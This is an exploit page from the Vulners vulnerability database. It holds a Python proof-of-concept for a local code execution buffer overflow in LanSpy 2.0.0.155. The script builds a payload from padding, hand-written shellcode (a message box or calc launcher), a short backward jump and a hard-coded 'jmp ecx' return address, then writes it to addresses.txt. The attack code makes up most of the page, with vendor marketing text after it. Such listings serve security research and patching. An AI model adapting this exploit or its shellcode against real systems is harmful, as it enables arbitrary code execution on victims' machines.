Vulners
Lucene search
LanSpy 2.0.0.155 local code execution vulnerability
import struct
# 32bit Alphanum-ish shellcodes
# Bad chars detected: 00 2d 20
# MessageBoxA at => 00404D80
msgbox_shellcode = (
"\x31\xC0\x50\x68"
"\x70\x77\x6E\x64"
"\x54\x5F\x50\x57"
"\x57\x50\x35\xC4"
"\x80\x80\x55\x35"
"\x44\xCD\xC0\x55"
"\x50\xC3"
)
# WinExec at -> 004EC4FF
calc_shellcode = (
"\x31\xC0\x50\x68"
"\x63\x61\x6C\x63"
"\x54\x5F\x50\x57"
"\x35\xC3\x4E\xC3"
"\x55\x35\x3C\x8A"
"\x8D\x55\x50\xC3"
)
# Change the shellcode to be used here
scde = calc_shellcode
#scde = msgbox_shellcode
# 126 are the bytes to jmp back with opcode \x74\x80 => ja -80h and it is where our shellcode resides
junk = 'A'*(676-126)
if len(scde) > 126:
exit("[e] Shellcode is too big! Egghunter maybe? ;)")
# 0040407D => jmp ecx inside LanSpy
jecx = 'A'*(126-len(scde))+'\x74\x80CC'+struct.pack('<I', 0x0040407D)
# Junk + Shellcode for calc + jump to our first stage jump which jumps to the second stage calc shellcode
payl = junk + scde + jecx
with open("addresses.txt", "wb") as f:
f.write(payl)
f.close()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Oct 2016 00:00Current
7.1High risk
Vulners AI Score7.1